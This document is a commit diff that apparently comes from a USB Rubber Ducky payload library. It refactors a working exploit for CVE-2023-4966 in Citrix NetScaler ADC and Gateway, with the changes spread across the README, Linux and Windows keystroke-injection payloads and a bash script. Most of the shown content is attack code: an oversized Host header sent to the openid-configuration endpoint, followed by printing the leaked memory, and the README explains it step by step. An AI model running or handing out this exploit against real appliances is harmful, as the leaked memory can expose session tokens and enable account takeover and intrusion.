Adapted to the use of variables

[+] Added vars
[+] Attackmode
[-] Img replaced with a link
[+] README adapted to the new payload

payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/README.md

@@ -43,17 +43,18 @@ The following supported versions of NetScaler ADC and NetScaler Gateway are affe
 
 This bulletin only applies to customer-managed NetScaler ADC and NetScaler Gateway products. Customers using Citrix-managed cloud services or Citrix-managed Adaptive Authentication do not need to take any action.
 
-![](./assets/1.png)
+![](https://i.ibb.co/x7SRvGf/1.png)
 
 ***Source**: The information was acquired from the official website of [support.citrix.com](#sources).*
 
 ## Settings
 
-The sole configuration parameter that requires modification is the hostname, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the "payload.txt" file to specify the desired address.
+The sole configuration parameter that requires modification is the HOSTNAME, which represents the IP address (without protocol) of the target Citrix ADC / Gateway machine, such as 192.168.1.200. To configure this setting, you need to edit the payload.txt file to specify the desired address.
 
-```DuckyScript
-* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
-QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
+```plaintext
+HOSTNAME='192.168.1.200'
+...
+QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
 ```
 
 ## Payload Description Windows
@@ -82,10 +83,10 @@ Here, a variable `$headers` is created as a hashtable containing the HTTP header
 $headers = @{ 'Host' = $header_value }
 ```
 
-This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "#HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
+This line defines the variable `$uri`, which contains the target URL for the HTTP request. Note that "$HOSTNAME" is a DuckyScript variable that should be replaced with the actual value before executing the script (see the [Settings](#settings) section).
 
 ```powershell
-$uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
+$uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
 ```
 
 Here, the HTTP request to the specified URL is executed using the GET method and with the headers defined in the `$headers` variable. The result of the request is stored in the `$response` variable.
@@ -130,7 +131,7 @@ headers="-H 'Host:$header_value'"
 This line uses cURL to send a request to the specified URL with the constructed `headers`. The `-s` flag suppresses progress meter and error messages, while the `-k` flag allows cURL to perform an insecure SSL connection. The `--connect-timeout 10` flag sets a connection timeout of 10 seconds. The response is stored in the `response` variable.
 
 ```bash
-response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
+response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
 ```
 
 In this block, it checks if the exit status of the cURL command is 0 (indicating a successful request) and if the first three characters of the response are "200" (HTTP success code). If both conditions are met, it prints `--- Dumped memory ---`, followed by a portion of the response starting from character 131,051, and then indicates that the hostname is vulnerable. If the conditions are not met, it prints `Could not dump memory`.
@@ -139,7 +140,7 @@ In this block, it checks if the exit status of the cURL command is 0 (indicating
 if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
     echo "--- Dumped memory ---"
     echo "$response" | cut -c 131051-
-    echo "The #HOSTNAME is vulnerable!"
+    echo "The $HOSTNAME is vulnerable!"
     echo "---      End      ---"
 else
     echo "Could not dump memory"
@@ -148,7 +149,7 @@ fi
 
 ## Script sh
 
-The script.sh script accepts one parameter, which should be the target hostname without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
+The script.sh script accepts one parameter, which should be the target HOSTNAME without the application of a protocol (e.g., `192.168.1.200`). It uses this parameter to perform a specific action in the exploit.
 
 Example Execution:
 
@@ -166,14 +167,12 @@ After assigning execute permissions, the above command allows the user to run th
 
 ## Sources
 
-- [1] Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
-- [2] Detect Rady: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
-- [3] Passive Windows Detect: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
-- [4] Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
+1) Official source of information acquisition: https://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967
+2) Red Hot Cyber post: https://www.redhotcyber.com/post/e-pubblico-lexploit-per-il-bug-critico-di-citrix-netscaler-adc-e-gateway-scopriamo-come-funziona/
 
 ## Credits
 
-<h2 align="center"> Aleff</h2>
+<h2 align="center">Aleff</h2>
 <div align=center>
 <table>
   <tr>

payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/lin-payload.txt

@@ -3,29 +3,29 @@
 * REM # Title       : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966   #
 * REM # Author	    : Aleff                                                            #
 * REM # Version	    : 1.0                                                              #
-* REM # Category	  : incident-response                                                #
+* REM # Category	: incident-response                                                #
 * REM # Target	    : Citrix NetScaler ADV; NetScaler Gateway                          #
 * REM #                                                                                #
 * REM ##################################################################################
 
-* REM GNU/Linux Version
+ATTACKMODE HID
+
+QUACK REM VARIABLES
+* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
+HOSTNAME='192.168.1.200'
 
 QUACK DELAY 3000
 QUACK CTRL-ALT t
 QUACK DELAY 1000
-
 QUACK STRING header_value=$(yes a | head -n 24576 | tr -d '\n')
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING headers="-H 'Host:$header_value'"
 QUACK ENTER
 QUACK DELAY 500
-
-* REM Define here your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
-QUACK STRING response=$(curl -s -k -H "$headers" "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
+QUACK STRING response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
 QUACK ENTER
 QUACK DELAY 500
-
 QUACK STRING if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
 QUACK ENTER
 QUACK DELAY 500

payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/script.sh

@@ -1,12 +1,12 @@
 #!/bin/bash
 
-hostname="$1" # first parameter
+HOSTNAME="$1" # first parameter
 
 header_value=$(yes a | head -n 24576 | tr -d '\n')
 
 headers="-H 'Host:$header_value'"
 
-response=$(curl -s -k -H "$headers" "https://$hostname/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
+response=$(curl -s -k -H "$headers" "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration" --connect-timeout 10)
 
 if [ $? -eq 0 ] && [ "$(echo $response | cut -c 1-3)" == "200" ]; then
 	echo "--- Dumped memory ---"

payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt

@@ -8,7 +8,11 @@
 * REM #                                                                                #
 * REM ##################################################################################
 
-* REM Windows Version
+ATTACKMODE HID
+
+QUACK REM VARIABLES
+* REM 1) Define replacing into the $HOSTNAME var your target, so put here the Citrix ADC / Gateway target, excluding the protocol.
+HOSTNAME='192.168.1.200'
 
 QUACK DELAY 3000
 QUACK GUI r
@@ -16,30 +20,24 @@ QUACK DELAY 500
 QUACK STRING powershell
 QUACK ENTER
 QUACK DELAY 1000
-
 QUACK STRING $header_value = 'a' * 24576
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING $header_value = $header_value -replace "\n", ""
 QUACK ENTER
 QUACK DELAY 500
-
 QUACK STRING $headers="-H 'Host:$header_value'"
 QUACK ENTER
 QUACK DELAY 500
-
 QUACK STRING $headers = @{'Host' = $header_value}
 QUACK ENTER
 QUACK DELAY 500
-
-* REM Replace #HOSTNAME with your target, so put here the Citrix ADC / Gateway target, excluding the protocol (e.g. 192.168.1.200)
-QUACK STRING $uri = "https://#HOSTNAME/oauth/idp/.well-known/openid-configuration"
+QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
 QUACK ENTER
 QUACK DELAY 500
-
 QUACK STRING if ($response.Substring(0, 3) -eq "200") {
 QUACK ENTER
 QUACK DELAY 500